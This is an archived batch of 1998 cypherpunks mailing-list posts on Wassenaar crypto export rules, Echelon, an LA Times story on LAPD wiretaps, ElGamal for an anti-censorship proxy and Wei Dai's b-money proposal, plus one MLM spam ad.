From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Tue, 8 Dec 1998 10:12:53 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: What freedom means... [Register]
Message-ID: <199812080149.TAA07468@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text




Forwarded message:

> The Register - http://www.theregister.co.uk

> http://www.theregister.co.uk/981207-000006.html
> IBM PC martyrs meet untimely end
> Chinese smugglers of kit put to death 

> http://www.theregister.co.uk/981206-000003.html
> Eurospook plan for Web and wireless bugs
> If Enfopol 98 is genuine, the cops are getting seriously out of control 

[much deleted]


    ____________________________________________________________________

           If I can put in one word what has always infuriated me
           in any person, any group, any movement, or any nation,
           it is: bullying
                                                Howard Zinn

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@clueserver.org>
Date: Tue, 8 Dec 1998 12:39:58 +0800
To: cypherpunks@Algebra.COM
Subject: LA Times article on Wiretapping
Message-ID: <3.0.5.32.19981207202040.042fb870@clueserver.org>
MIME-Version: 1.0
Content-Type: text/plain



Here is a link to the LA Times feature story on the LAPD's use of wiretaps.
An interesting read.  Expect such things from the rest of the constabulary
when examined.

http://www.latimes.com/HOME/NEWS/STATE/t000111718.html


---
|      Bill Clinton - Bringing back the Sixties one Nixon at a time!     |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|                                                  | behind the keyboard.|
|         http://www.ctrl-alt-del.com/~alan/       |alan@ctrl-alt-del.com|




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frederick Burroughs <riburr@shentel.net>
Date: Tue, 8 Dec 1998 10:33:09 +0800
To: Cypherpunks <cypherpunks@ns.minder.net>
Subject: Re: What was the quid pro quo for Wassenaar countries?
In-Reply-To: <199812071331.IAA23674@smtp2.mindspring.com>
Message-ID: <366C8875.C8DC0A3C@shentel.net>
MIME-Version: 1.0
Content-Type: text/plain





John Young wrote:

> Peter Gutmann may be close to the truth about Echelon's role
> in the Wassenaar changes.
>
> The NYT reports today that the US is proposing to NATO a
> combined intelligence center to combat use of Weapons of Mass
> Destruction by rogue states and non-state terrorists like Usama
> Bin Laden.

[...]

> The NYT has been running a series on how long the TLAs and military
> have been tracking Usama Bin Laden (at least since 1991, maybe longer).
> It appears that if he did not exist he would have to be invented for the
> counterterrorism agenda. It's even possible that Bin Laden is their invention,
> cultivated, strung along, not arrested, for that purpose. The African bombings
> were probably preventable, and it will be interesting if Congress lets this
> possibility go uninvestigated.

It is a matter of record that the CIA vastly overestimated the wherewithal of the
former Soviet military, much less economy. Was this done on purpose to justify
opening the Capitol floodgates to float the USS United States, flagship of the
lone superpower?

Today's justification; third world sand fleas lighting paperbags full of dogshit
and ringing the doorbell. Can't have pranksters disturbing our good neighborhood.
Don't let children play with matches, and the US will organize the neighborhood
watch.

Meanwhile, the earth warms, storms ravage the tropics, glaciers recede, permafrost
defrosts, icebergs the size of Delaware calve and castoff, and the warm earth
sheds it's ozone like a sweater. Yeah, let's spend millions on Usama Bin Laden.
Who's the captain of this fuckin' ship of fools? How do you spell democracy?
M-U-T-I-N-Y.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pgut001@cs.auckland.ac.nz (Peter Gutmann)
Date: Mon, 7 Dec 1998 16:36:45 +0800
To: cypherpunks@cyberpass.net
Subject: Re: What was the quid pro quo for Wassenaar countries?
Message-ID: <91301833500932@cs26.cs.auckland.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain



One thing which came to me recently when I was trying to figure out what sort 
of gun the US held to the rest of the world's head to get them to agree to 
this: Could the Wassenaar outcome have been a sign of Echelon in action?
 
Consider this: Delegates from each country have been travelling to Vienna for 
some months now to negotiate their countries position.  During the 
negotiations, they'll be contacting their governments via phonecalls carried 
over microwave trunks, satellite links, or undersea cables to discuss the 
progress of the negotiations and what position they should take.  Just like 
the negotiations which lead to the Five-Power Treaty in 1921, if one country 
had the ability to intercept all the other countries communications it would 
know how far they could be pushed, and where the most resistance was likely to 
come from, allowing greater amounts of "persuasion" to be concentrated on them.
 
I can't think of a more appropriate application of Echelon (use worldwide 
surveillance technology to perpetuate the usefulness of worldwide surveillance 
technology), and it would go some way towards explaining the very peculiar 
agreement which was reached.
 
Peter.
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Tue, 8 Dec 1998 11:47:23 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Building crypto archives worldwide to foil US-built Berlin Walls (fwd)
Message-ID: <199812080331.VAA07823@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Mon, 7 Dec 1998 21:38:55 -0500
> From: Robert Hettinga <rah@shipwright.com>
> Subject: Building crypto archives worldwide to foil US-built Berlin Walls

> Subject: Building crypto archives worldwide to foil US-built Berlin Walls
> Date: Mon, 07 Dec 1998 15:23:54 -0800
> From: John Gilmore <gnu@toad.com>

> The US Wassenaar initiative is an attempt to deny the public not only
> all future strong crypto developments, but all existing ones.  As
> today's message from Denmark makes clear, the freedom-hating
> bureaucrats are threatening to prosecute a citizen merely for
> publishing PGP on his web page.

And this is different from yesterday how?

> Let's at least ensure that they don't eliminate *today's* strong
> crypto, by replicating crypto archives behind each Berlin Wall they
> threaten to erect.

Are you offering to put up your monies to provide any and all legal and
other support for any such site that participates? When is your site going
up?


    ____________________________________________________________________

           If I can put in one word what has always infuriated me
           in any person, any group, any movement, or any nation,
           it is: bullying
                                                Howard Zinn

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 8 Dec 1998 11:32:58 +0800
To: cypherpunks@cyberpass.net
Subject: Building crypto archives worldwide to foil US-built Berlin Walls
Message-ID: <v04020a3bb29241b9b5b4@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


X-Authentication-Warning: toad.com: Host localhost [127.0.0.1] didn't use
HELO protocol
To: cryptography@c2.net, gnu@toad.com
Subject: Building crypto archives worldwide to foil US-built Berlin Walls
Date: Mon, 07 Dec 1998 15:23:54 -0800
From: John Gilmore <gnu@toad.com>
Sender: owner-cryptography@c2.net

The US Wassenaar initiative is an attempt to deny the public not only
all future strong crypto developments, but all existing ones.  As
today's message from Denmark makes clear, the freedom-hating
bureaucrats are threatening to prosecute a citizen merely for
publishing PGP on his web page.

Let's at least ensure that they don't eliminate *today's* strong
crypto, by replicating crypto archives behind each Berlin Wall they
threaten to erect.  Today we depend on a small number of archives (in
a small number of countries) containing source and binaries for PGP,
SSH, Kerberos, cryptoMozilla, IPSEC, and many other useful crypto
tools that we use daily.

Let's replicate these archives in many countries.  I call for
volunteers in each country, at each university or crypto-aware
organization, to download crypto tools while they can still be
exported from where they are, and then to offer them for export from
your own site and your own country as long as it's legal.  (The
Wassenaar agreement is not a law; each country has merely agreed to
try to change its own laws, but that process has not yet started.)

And if at some future moment your own government makes it illegal for
you to publish these tools, after all your appeals are denied, all the
pro-bono court cases rejected, and all the newspaper coverage you can
get has been printed, then restrict your web site so that only your
own citizens can get the tools.  That'll still be better than the
citizens of your country having NO access to the tools of privacy!

(I suggest putting these tools on a Web site on a machine that you
own, rather than on a web site where you buy space from someone else.
That way there'll be nobody for the freedom-squashers to threaten
except you.)

I'm sure that John Young's excellent http://jya.com site will be happy
to provide an index of crypto archives around the world, if people
will send him notices at jya@pipeline.com as your sites come up.
(Each archive should locally mirror this list, so that we won't depend
on a single site.)

Rather than having their desired effect of squelching crypto
distribution, perhaps their overbold move can inspire us to increase
strong crypto distribution tenfold, by making it clear to the public
that if you don't keep a copy on your own hard drive, the governments
of the world will be merciless in scheming to deny you access to it.
And if crypto developers have to publish on books, or rely on
smugglers to get crypto from country to country, then at least each
country will have its distribution arrangements already ready for when
the book is scanned or the smuggler arrives.

	John Gilmore

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David G. Koontz" <koontz@ariolimax.com>
Date: Tue, 8 Dec 1998 15:54:35 +0800
To: John Gilmore <gnu@toad.com>
Subject: Re: What was the quid pro quo for Wassenaar countries?
In-Reply-To: <199812050240.SAA24692@toad.com>
Message-ID: <366CD51E.41C67EA6@ariolimax.com>
MIME-Version: 1.0
Content-Type: text/plain



John Gilmore wrote:
> 
>> PS:  I particularly like Ambassador Aaron's characterization that
> this new development will help US industry, by censoring foreign crypto
> publishers in the same way the US government censors US publishers.
> A giant step forward for freedom and commerce everywhere, eh Mr. Aaron?
> What an incredibly talented liar, I mean diplomat, he is.

A glorious anouncement!  The chocolate ration has been raised to 20
grams 
today, from 24 grams!



(for those of you who thought it would never get here)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Geer <geer@world.std.com>
Date: Tue, 8 Dec 1998 12:53:33 +0800
To: Tom Weinstein <tomw@netscape.com>
Subject: Re: What was the quid pro quo for Wassenaar countries?
In-Reply-To: <366A2F3B.9A20B93A@netscape.com>
Message-ID: <199812080428.AA19717@world.std.com>
MIME-Version: 1.0
Content-Type: text/plain




    > What an incredibly talented liar, I mean diplomat, he is.

Ah, but you forget that the definition of diplomacy
is the art of lying in State.

--dan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bennett Haselton <bennett@peacefire.org>
Date: Tue, 8 Dec 1998 14:05:24 +0800
To: cypherpunks@cyberpass.net
Subject: Re: DSA for encryption
In-Reply-To: <199812080525.GAA32479@replay.com>
Message-ID: <3.0.5.32.19981207234844.01003230@h.mail.vanderbilt.edu>
MIME-Version: 1.0
Content-Type: text/plain



At 06:25 AM 12/8/98 +0100, Anonymous wrote:
>>Of course, any manufacturer of Internet censorship proxy server software
>>could easily add ians.ml.org to their list of blocked sites (as they have
>>all already done with Anonymizer), so the idea would be for people to get
>>their friends to set up port-forwarding programs on computers that were not
>>blocked by the censoring proxy, and those could be set up to relay requests
>>between the IANS server and the computer behind the proxy server.
>
>It may not be so easy to get people to set up port-forwarding programs.
>These could be a target for hackers seeking to cover their tracks as they
>try break-ins.

The ports would only forward Web-based traffic, so an attack would have to
be carried out over HTTP.  The phf exploit is a notorious example; the IANS
was modified early to specifically prevent it from being used for phf
exploits.  But most other attacks cannot be done just with a Web browser as
far as I know.

One additional option would be to distribute port-forwarding programs that
keep logs of traffic.  The standard port-forwarding program for Windows
which we plan on recommending, Portpipe, does not do this, but we might
write our own version that does.

>Also, how many people in this day of commercial ISPs are
>able to set up port-forwarding programs?

Portpipe can be set up in thirty seconds on a Windows machine.  What you
need though is a machine that is connected more or less permanently to the
Internet.

>It would seem more promising to make your web page script be simple
>and portable enough that even users of AOL and free webpage hosts like
>GeoCities would be able to install it.

The problem with having lots of people run a copy of IANS is not that it
couldn't be made easy to install, but in many cases it might not be even
possible to install.  Low-end Web page accounts do not allow the running of
CGI scripts on the Web server.

>>I am working on a JavaScript form that could be used on the client side to
>>solve this problem.  We would like to use DSA to encrypt the requests sent
>>using IANS, since I've heard DSA can be used for encryption without
>>royalties, unlike, for example, RSA.
[...]
>What you want to do is to use the mathematical principle behind DSA, which
>is the difficulty of solving the discrete log problem, and use an encryption
>algorithm which relies on that same math problem, namely Diffie-Hellman or
>ElGamal encryption.
[...]
>If you need more information about what the various values mean, or how
>to create a DSA and/or ElGamal key, just ask.

Thanks!  Some people had already pointed out to me that ElGamal would be an
ideal choice, and was probably what I had in mind when I was looking for "a
version of DSA that can be used for encryption".

I'll follow the outline of the ElGamal algorithm given at
	http://www1.shore.net/~ws/Extras/Security-Notes/lectures/publickey.html

and the outline given in _Applied Cryptography_ unless you have another
recommendation.

>Really, ElGamal is simple enough that if you have access to a large-number
>math package, writing your own is probably easier than trying to get DSA
>to do it.  It is unlikely that you will find a DSA implementation which
>allows you to specify all the needed parameters above, particularly h
>and k.  Usually h is forgotten after key generation and not used during
>signature, and implementions will probably want to choose k themselves
>since it is a very sensitive parameter.

I will probably have to write my own large-number package for JavaScript in
order to implement ElGamal.  You've given me enough to get started though,
thanks!  (If I have any more questions, I'll have to post them to the list
since you're using the re-mailer :-)  but maybe the list population will
find this interesting anyway.)

	-Bennett

bennett@peacefire.org    (615) 421 5432    http://www.peacefire.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Tue, 8 Dec 1998 08:33:24 +0800
To: cypherpunks@cyberpass.net
Subject: Wiretap Operation Sheds Light on LAPD Tactics
Message-ID: <199812072323.AAA32006@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



If it is Monday, December 7, 1998, you can go to
http://www.latimes.com/HOME/NEWS/STATE/topstory.html and read about how
Los Angeles police wiretapped a small cellular phone service provider
because his policies were too helpful for drug dealers.  He didn't try
hard enough to verify customer names, he sold cell phones with built in
scramblers, he allowed customers to change phones and numbers easily.
After years of investigation the company owners were never charged,
but a number of their customers were convicted as drug dealers, in many
cases never being told about the phone taps.

It's an ominous account of how privacy-friendly policies can be used by
the police to justify an investigation.

If it's after December 7, read the story here:

:      Los Angeles narcotics officers spent a lot of time spying on John
: Lopez and his small storefront telephone company--Atel Cellular
:      Convinced he was in cahoots with drug dealers by selling secure,
: cop-proof phone service--no questions asked--they staked out his
: Downey office, tailed his customers and finally wiretapped the
: customers' and Atel's phones.
:      Starting with just his business lines and a handful of customers,
: the operation spread like kudzu, eventually covering hundreds of
: phones and thousands of conversations and becoming the largest wiretap
: operation in the history of Los Angeles County.
:      When the three-year probe ended in March, police had arrested
: dozens of Atel's customers, but not Lopez or any of his employees.
:      The Atel taps are at the center of the nine-month legal
: controversy over whether prosecutors have been improperly concealing
: their wiretapping operation and the information derived from it. Also
: at issue are charges by defense lawyers representing Atel customers
: that the allegations against Atel Cellular are a sham created to win
: court orders permitting an electronic fishing expedition against their
: clients.
:      Manager Lopez and Atel's owner, Atil Nath, refused to
: comment. Their lawyers say the two men are not involved in drugs.
:      "The whole concept [of the police wiretap operation] was
: preposterous," said Dale Hardeman, a Downey attorney. "How are we
: supposed to know if customers are involved in criminal activity?"
:      Details of the probe--revealed through interviews, police
: affidavits, wire monitor logs and volumes of court records--provide a
: fascinating inside look at how detectives can mold the legal actions
: of a suspect into criminal scenarios and persuade judges to authorize
: snooping on people's private conversations.
:      The probe also raises broader questions, such as whether many of
: the reasons given for tapping Atel could just as easily be applied to
: other phone companies, and whether wiretaps should be allowed to
: continue indefinitely, even when police work for months without
: finding enough evidence to arrest the target.
:      The 4th Amendment protects phone privacy.
: 
:      Need for Probable Cause
: 
:      To tap a phone, prosecutors have to get a court order by showing
: they have sufficient reason, known as probable cause, to believe the
: phone subscriber is committing crimes. Even if a subscriber's actions
: are legal when considered individually, those actions can amount to
: probable cause when viewed as part of a larger picture.
:      If a tap provides a lead or evidence, prosecutors must reveal the
: tap and give transcripts to the defendant before trial.
:      Though the Atel investigation established strong suspicion among
: investigators that Lopez knew he was dealing with drug traffickers, it
: fell far short of proving it.  But police were getting a steady supply
: of leads against his customers as well as new phone numbers of people
: they considered suspicious. So they kept going back to court for
: extensions and new taps.
:      Police referred all questions about the case to prosecutors, who
: defend the wiretap practice, saying they had sufficient evidence to
: suspect Lopez of wrongdoing.
:      Dist. Atty. Gil Garcetti noted in a prepared statement that the
: operation had court approval. He said police targeted Atel because
: they believed most of its business was providing phones to drug
: dealers without requiring them to provide any personal information.
:      Superior Court Judge John Ouderkirk, who approved most of the
: orders, said he could not discuss pending cases.
:      Not much is known about Lopez and Nath. Nath lives in a two-story
: home in a neat, well-kept neighborhood in Downey. Lopez lives in Pico
: Rivera with his wife, Maria, and their children. Both have said in
: court papers that they have no criminal record. Their company is one
: of about three dozen small phone companies in Los Angeles County that
: resell or sublease service and equipment.
:      Police say the closest they came to showing a direct connection
: between Lopez and drugs was during a stakeout at his home when they
: saw a man arrive in a pickup truck registered to a member of what they
: say is a drug gang.
:      The investigation grew out of, and, in many ways, was modeled
: after a 1994 wiretap of Downey Communications, another small retailer
: of phone services. As in the Atel probe, police staked out the
: business and collected information for wiretap orders.
:      During hours of surveillance, they watched customers arrive and
: leave. They noticed the types of vehicles they drove. They even took
: notes on their manner of dress, eventually deciding that silk floral
: shirts, pressed denim, hand-stitched leather belts and expensive
: cowboys boots were haute couture on the L.A. drug scene.
:      Police claimed that Downey leased to drug dealers and was
: "heavily involved in the sale and transportation of narcotics."
: Officers would later use the same language in Atel affidavits.
:      The Downey wiretaps lasted a year. They ended in drug and cash
: seizures and 12 indictments, including one against the brother of
: Downey's owner. But the owners and employees of Downey were not
: arrested. The owner said in court papers he was never interviewed by
: police, was not aware of the investigation and has never been charged
: with a crime.
:      Police used the Downey Communications probe as a springboard to
: Atel.
:      The connection was tenuous.  Downey and Atel customers shared the
: same taste in cars and fashion.  Downey employees were seen paying
: short visits to Delta Tri-Telesis, a now-defunct cellular phone
: business owned by Nath and operated by Lopez.
:      So in September 1995, officers turned their binoculars on Atel,
: which had taken Delta's customers.  They often saw customers in cars
: registered to targets of previous drug probes going to houses once
: used as drug "stash" sites and employing what police considered
: "counter-surveillance" driving.
: 
:      Reports on Surveillance
: 
:      Investigators say they saw Lopez use such techniques when they
: were tailing him in May 1996, shortly before they started tapping his
: business phones. They said they saw him on the freeway changing lanes
: erratically and driving "at a high rate of speed in excess of 70 miles
: per hour," later making a U-turn on Arrington Avenue and lingering too
: long--three minutes--at an intersection.
:      Police also noted in affidavits that Lopez sold money counters
: and phone scramblers; that he apparently didn't care if customers gave
: him fictitious names; that he let customers change numbers quickly and
: easily.
:      Drug suspects were frequently found with Atel phones.
:      Police saw what they considered suspicious calling patterns--too
: many calls in a short period of time--among groups of Atel customers.
:      Although such evidence was far from enough to file charges
: against Lopez and Nath, legal experts say it was sufficient as
: probable cause for a court order, which was granted in May 1996 for 30
: days.
:      After a month of wiretapping, Garcetti's prosecutors--armed with
: transcripts of tapped phone conversations--were back in court asking
: for the first extension of the court order and for permission to tap
: new telephone numbers. From then on, requests for extensions built on
: previous ones. Police eventually received 19 extensions.
:      Although the taps provided a mother lode of leads against drug
: dealers, they seldom offered much evidence against Atel. There was one
: conversation that police described in an affidavit as particularly
: damning for Lopez. It was on June 25, 1996, from "Oscar," who had been
: under police surveillance.
:      "Hey John, this number is no good," Oscar tells Lopez.
:      Lopez: Not good?
:      Oscar: They're on me again!  Right behind.
:      Lopez: OK, bring it in now!
:      But most of Lopez's conversations in the affidavits simply
: confirmed what police already knew: that customers dealt directly with
: Lopez, that Lopez based billing records on phone numbers instead of
: names and that he handled billing arrangements by phone.
:      In contrast, the conversations among customers were
: fruitful. Most were cryptic discussions about drug deals, pickup
: locations, delivery times, police said. According to investigators,
: they never mentioned drugs, using words such as "ladies," "stuff" or
: simply a number understood to be an amount of drugs.
:      For example, in June 1996, police overheard this exchange:
:      Receiver: How do they look?
:      Caller: Real good. How many do you have?
:      Receiver: 40 plus 5 out, plus some lying around.
:      Caller: OK. I'll hold whatever else I have.
:      Without interpretation by detectives, there is little indication
: that that conversation is about drugs.
:      By the time the operation ended in March, police had tapped close
: to 400 Atel phones.
:      The wiretap controversy erupted that month because San Diego
: attorney Philip DeMassa and two other lawyers discovered that the case
: against their clients sprang from information garnered from the Atel
: taps and handed off to other officers who were not told of the taps so
: they would not have to reveal them to defense lawyers.  Later, Deputy
: Public Defender Kathy Quant went to court for indigent defendants.
:      Garcetti acknowledged in June that he withheld tap information in
: 58 cases and he agreed to notify defendants about future taps.
: Although a judge upheld the wiretap handoff practice last month, with
: some qualifications, Quant is considering an appeal. Other defense
: lawyers are challenging whether Garcetti has revealed all tap cases.
:      Whatever the outcome, the probe clearly helped police arrest some
: of Atel's customers. It netted large amounts of narcotics, about $8
: million in drug proceeds and dozens of arrests.
:      Lawyers base their doubts about the investigation of Nath and
: Lopez partially on the fact that it lasted three years and police
: never tried to interview them. In fact, DeMassa alleges in court
: papers that Lopez and Nath are actually police informants or are
: perhaps cooperating through a grant of immunity from prosecution, an
: assertion prosecutors call absurd.
:      DeMassa is hoping to show that police misled the courts when they
: said they were investigating Lopez and Nath.
:      If Nath and Lopez were such an integral part of a gigantic drug
: trafficking operation, the police should be trying to protect the
: public from them, he said.
:      "Why isn't anything happening to these guys?" he said.
: 
:      Acts Were Not Illegal, Critics Say
: 
:      None of Atel's acts described in the affidavits was illegal,
: Quant and other critics say.  Well-known phone companies engage in
: many of the same practices, Quant said. If police use the same
: standards elsewhere, any companies, especially small retailers, may be
: vulnerable to taps.
:      Many of the actions cited in Atel affidavits are suspicious only
: in the eyes of police, Quant said.  Money counters are legitimate, and
: other firms advertise "no eavesdropping" cell phones because
: legitimate businesses need secure communications, she said.
:      There is nothing suspicious, for example, about high usage of
: cell phones, particularly among real estate agents, salespeople, even
: news reporters, Quant said.  And other small retailers allow people to
: change numbers frequently.
:      Regardless of Atel's guilt or innocence, what police did to Atel
: could be done to any legitimate businesses, she said.
:      Deputy Dist. Atty. Robert Schirn dismissed that notion.
:      "That's quite a stretch," he said.
:      "Atel was a facilitator and made it possible for drug dealers to
: break the law," he said.
:      Yet Schirn acknowledged that he could not point to any conclusive
: evidence that Nath and Lopez knew that some of their customers were
: drug dealers.
:      He said he didn't know if police tried to persuade defendants to
: testify against Nath or Lopez.  Even if they did, prosecutors would
: need more evidence than the tainted testimony of accomplices to make
: an arrest, he said.
:      As for Atel, Hardeman said his clients had no idea some of their
: customers were criminals.
:      "This investigation has virtually destroyed them," he said.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jill567@copacabana.com
Date: Tue, 8 Dec 1998 16:42:42 +0800
To: <cypherpunks@cyberpass.net>
Subject: PUTS MONEY INTO YOUR POCKET -- BUSINESS OPPORTUNITY AD
Message-ID: <199812080809.AAA20758@cyberpass.net>
MIME-Version: 1.0
Content-Type: text/plain



DEAR FELLOW ENTRPENEUR
 ***********************
 I AM GOING TO SHARE WITH YOU INFO THAT HAS BEEN KEPT
 SECRET FOR YEARS. I AM GOING TO SHOW YOU HOW TO BE A
 PART OF THE 5% WHO ALWAYS MAKE MONEY IN MLM...ALWAYS...

 WOULD YOU LIKE TO KNOW HOW THE "BIG BOYS' DO IT?
 *************************************************
 WOULD YOU LIKE TO KNOW HOW YOU CAN DO THE SAME?
 *************************************************
 Actually it's SIMPLE. These people always make money. 
 Their methods are fool proof. What is it that they do 
 that allows them to be so SUCCESSFUL??  Well I'll tell 
 you. It is a method called "FUNDED PROPOSALS".  Who uses 
 these "FUNDED PROPOSALS"????

 Here are just a few of the people that use this method all the 
time:

 JOHN MILTON FOGG, JOE SCHROEDER, "BIG AL", ROBERT BLACKMAN,
 SHIRLEY SILVA, BARBARA COLLINS AND JOE GODDA. These people
 have made millions using this method.
 They shared this SYSTEM with me and I will SHARE IT WITH YOU!!
 It's SIMPLE, it's EASY, it's inexpensive and it's BRAND NEW!!!

                     ABSOLUTELY NO OBLIGATION!!
                       
                             ACT NOW

                CLICK HERE:http:mlmfounders.com/king/


 SEE WHAT I AM WILLING TO SHARE. NEVER AGAIN WILL YOU FLOUNDER.
 THIS SYSTEM WILL ALWAYS MAKE YOU MONEY!! 

                             ACT NOW!!

           CLICK HERE:http://www.mlmfounders.com/king/

 JOE SCHROEDER SAYS:  "YOU DON'T HAVE TO GET IT RIGHT YOU
                       JUST HAVE TO GET IT GOING".

 THANK YOU FOR ALLOWING ME TO SHARE THIS AMAZING SYSTEM WITH YOU.

THIS MESSAGE SENT BY

EMAIL KING AND ASSOCIATES
]790 BONHILL RD
MISSISSAUGA, ON.

9055645091

TO BE REMOVED VISIT WWW.REMOVE-LISTDOTCOM
]
 
 
 
 
 
 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: x <x@x.com>
Date: Tue, 8 Dec 1998 17:51:47 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Wei Dei's "b-money" protocol
Message-ID: <3.0.32.19981208010003.006faf20@shell15.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



there must be something here that I'm missing.  At the core of this
protocol seems to be the establishment not of crypto anarchy but of a
crypto elite. in this scheme only the processors of computing power  have
economic power.  Now I realize that our current economic system is based on
economic power being invested in a closed community of powerful elites, and
is by no means egalitarian, but this looks to be like simply substituting
one group of "haves" for a different group of "haves"

I have to admit not being familiar with the Orthodoxy of crypto anarchy,
but if the premise is a centerless self organizing system of free agents
this protocol seems to miss the mark. or what is it that I am missing here?

At 07:37 PM 12/5/98 GMT, you wrote:
>
>
>Wei Dei recently announced (on cypherpunks) his "b-money, a new
>protocol for monetary exchange and contract enforcement for
>pseudonyms".
>
>Below is the text of his proposal.
>
>Comments to follow.
>
>Adam
>
>======================================================================
>http://www.eskimo.com/~weidai/bmoney.txt
>======================================================================
>
>I am fascinated by Tim May's crypto-anarchy. Unlike the communities
>traditionally associated with the word "anarchy", in a crypto-anarchy the
>government is not temporarily destroyed but permanently forbidden and
>permanently unnecessary. It's a community where the threat of violence is
>impotent because violence is impossible, and violence is impossible
>because its participants cannot be linked to their true names or physical
>locations.
>
>Until now it's not clear, even theoretically, how such a community could
>operate. A community is defined by the cooperation of its participants,
>and efficient cooperation requires a medium of exchange (money) and a way
>to enforce contracts. Traditionally these services have been provided by
>the government or government sponsored institutions and only to legal
>entities. In this article I describe a protocol by which these services
>can be provided to and by untraceable entities.
>
>I will actually describe two protocols. The first one is impractical,
>because it makes heavy use of a synchronous and unjammable anonymous
>broadcast channel. However it will motivate the second, more practical
>protocol. In both cases I will assume the existence of an untraceable
>network, where senders and receivers are identified only by digital
>pseudonyms (i.e. public keys) and every messages is signed by its sender
>and encrypted to its receiver.
>
>In the first protocol, every participant maintains a (seperate) database
>of how much money belongs to each pseudonym. These accounts collectively
>define the ownership of money, and how these accounts are updated is the
>subject of this protocol.
>
>1. The creation of money. Anyone can create money by broadcasting the
>solution to a previously unsolved computational problem. The only
>conditions are that it must be easy to determine how much computing effort
>it took to solve the problem and the solution must otherwise have no
>value, either practical or intellectual. The number of monetary units
>created is equal to the cost of the computing effort in terms of a
>standard basket of commodities. For example if a problem takes 100 hours
>to solve on the computer that solves it most economically, and it takes 3
>standard baskets to purchase 100 hours of computing time on that computer
>on the open market, then upon the broadcast of the solution to that
>problem everyone credits the broadcaster's account by 3 units.
>
>2. The transfer of money. If Alice (owner of pseudonym K_A) wishes to
>transfer X units of money to Bob (owner of pseudonym K_B), she broadcasts
>the message "I give X units of money to K_B" signed by K_A. Upon the
>broadcast of this message, everyone debits K_A's account by X units and
>credits K_B's account by X units, unless this would create a negative
>balance in K_A's account in which case the message is ignored.
>
>3. The effecting of contracts. A valid contract must include a maximum
>reparation in case of default for each participant party to it. It should
>also include a party who will perform arbitration should there be a
>dispute. All parties to a contract including the arbitrator must broadcast
>their signatures of it before it becomes effective. Upon the broadcast of
>the contract and all signatures, every participant debits the account of
>each party by the amount of his maximum reparation and credits a special
>account identified by a secure hash of the contract by the sum the maximum
>reparations. The contract becomes effective if the debits succeed for
>every party without producing a negative balance, otherwise the contract
>is ignored and the accounts are rolled back. A sample contract might look
>like this:
>
>K_A agrees to send K_B the solution to problem P before 0:0:0 1/1/2000.
>K_B agrees to pay K_A 100 MU (monetary units) before 0:0:0 1/1/2000. K_C
>agrees to perform arbitration in case of dispute. K_A agrees to pay a
>maximum of 1000 MU in case of default. K_B agrees to pay a maximum of 200
>MU in case of default. K_C agrees to pay a maximum of 500 MU in case of
>default.
>
>4. The conclusion of contracts. If a contract concludes without dispute,
>each party broadcasts a signed message "The contract with SHA-1 hash H
>concludes without reparations." or possibly "The contract with SHA-1 hash
>H concludes with the following reparations: ..." Upon the broadcast of all
>signatures, every participant credits the account of each party by the
>amount of his maximum reparation, removes the contract account, then
>credits or debits the account of each party according to the reparation
>schedule if there is one.
>
>5. The enforcement of contracts. If the parties to a contract cannot agree
>on an appropriate conclusion even with the help of the arbitrator, each
>party broadcasts a suggested reparation/fine schedule and any arguments or
>evidence in his favor. Each participant makes a determination as to the
>actual reparations and/or fines, and modifies his accounts accordingly.
>
>In the second protocol, the accounts of who has how much money are kept by
>a subset of the participants (called servers from now on) instead of
>everyone. These servers are linked by a Usenet-style broadcast channel.
>The format of transaction messages broadcasted on this channel remain the
>same as in the first protocol, but the affected participants of each
>transaction should verify that the message has been received and
>successfully processed by a randomly selected subset of the servers.
>
>Since the servers must be trusted to a degree, some mechanism is needed to
>keep them honest. Each server is required to deposit a certain amount of
>money in a special account to be used as potential fines or rewards for
>proof of misconduct. Also, each server must periodically publish and
>commit to its current money creation and money ownership databases. Each
>participant should verify that his own account balances are correct and
>that the sum of the account balances is not greater than the total amount
>of money created. This prevents the servers, even in total collusion, from
>permanently and costlessly expanding the money supply. New servers can
>also use the published databases to synchronize with existing servers.
